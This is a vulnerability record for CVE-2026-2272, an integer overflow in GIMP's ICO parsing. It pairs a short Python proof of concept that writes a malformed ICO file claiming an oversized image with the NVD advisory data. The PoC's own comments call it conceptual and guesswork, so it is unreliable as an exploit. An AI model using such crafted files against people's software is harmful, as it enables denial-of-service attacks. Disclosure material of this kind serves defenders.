CVE-2026-2272

import struct # PoC to generate a malformed ICO file that may trigger the integer overflow # This is a conceptual example based on the vulnerability description. def create_malformed_ico(filename): # ICO Header: 2 bytes Reserved (0), 2 bytes Type (1 for icon), 2 bytes Count (1) ico_header = struct.pack('<HHH', 0, 1, 1) # Directory Entry: 1 byte Width, 1 byte Height, 2 byte Colors, 2 byte Reserved # 2 byte Planes (1), 2 byte BitCount (32 for RGBA), 4 byte SizeInBytes # 4 byte ImageOffset (22 bytes = 6 + 16) # Setting Width/Height to 0 or 256 (common for large icons) but here we might # try to manipulate the size calculation logic if it were specific. # The vulnerability mentions oversized headers bypassing checks. width = 0 # Represents 256 in some contexts, or triggers specific parsing height = 0 colors = 0 planes = 1 bit_count = 32 # Let's set a large size that might cause the multiplication overflow in 32-bit # e.g., width * height * 4 bytes > 2^32 # Assuming the parser treats 0 as 256, 256*256*4 = 262144 (safe). # We need a value that overflows. Let's say the logic uses (w+1) or similar. # Without the exact source code logic of the vulnerable version, we provide a # structure that attempts to pass a large size claim. size_in_bytes = 0xFFFFFFFF # Claim huge size image_offset = 22 directory_entry = struct.pack('<BBHHHII', width, height, colors, 0, planes, bit_count, size_in_bytes, image_offset) with open(filename, 'wb') as f: f.write(ico_header + directory_entry) # Write minimal dummy data to satisfy the file structure f.write(b'\x00' * 100) create_malformed_ico('malicious.ico')

{"cve": {"id": "CVE-2026-2272", "sourceIdentifier": "[email protected]", "published": "2026-03-26T21:17:04.907", "lastModified": "2026-04-03T20:17:54.493", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in GIMP. An integer overflow vulnerability exists when processing ICO image files, specifically in the `ico_read_info` and `ico_read_icon` functions. This issue arises because a size calculation for image buffers can wrap around due to a 32-bit integer evaluation, allowing oversized image headers to bypass security checks. A remote attacker could exploit this by providing a specially crafted ICO file, leading to a buffer overflow and memory corruption, which may result in an application level denial of service."}, {"lang": "es", "value": "Se encontró una falla en GIMP. Existe una vulnerabilidad de desbordamiento de entero al procesar archivos de imagen ICO, específicamente en las funciones `ico_read_info` e `ico_read_icon`. Este problema surge porque un cálculo de tamaño para los búferes de imagen puede dar la vuelta debido a una evaluación de entero de 32 bits, permitiendo que los encabezados de imagen sobredimensionados eludan las comprobaciones de seguridad. Un atacante remoto podría explotar esto proporcionando un archivo ICO especialmente diseñado, lo que lleva a un desbordamiento de búfer y corrupción de memoria, lo que puede resultar en una denegación de servicio a nivel de aplicación."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gimp:gimp:3.0.6:*:*:*:*:*:*:*", "matchCriteriaId": "F9B29A73-05E5-438E-B994-61FBB133B6AC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "2F6AB192-9D7D-4A9A-8995-E53A9DE9EAFC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-2272", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438428", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://gitlab.gnome.org/GNOME/gimp/-/issues/15617", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438428", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://gitlab.gnome.org/GNOME/gimp/-/issues/15617", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking"]}]}}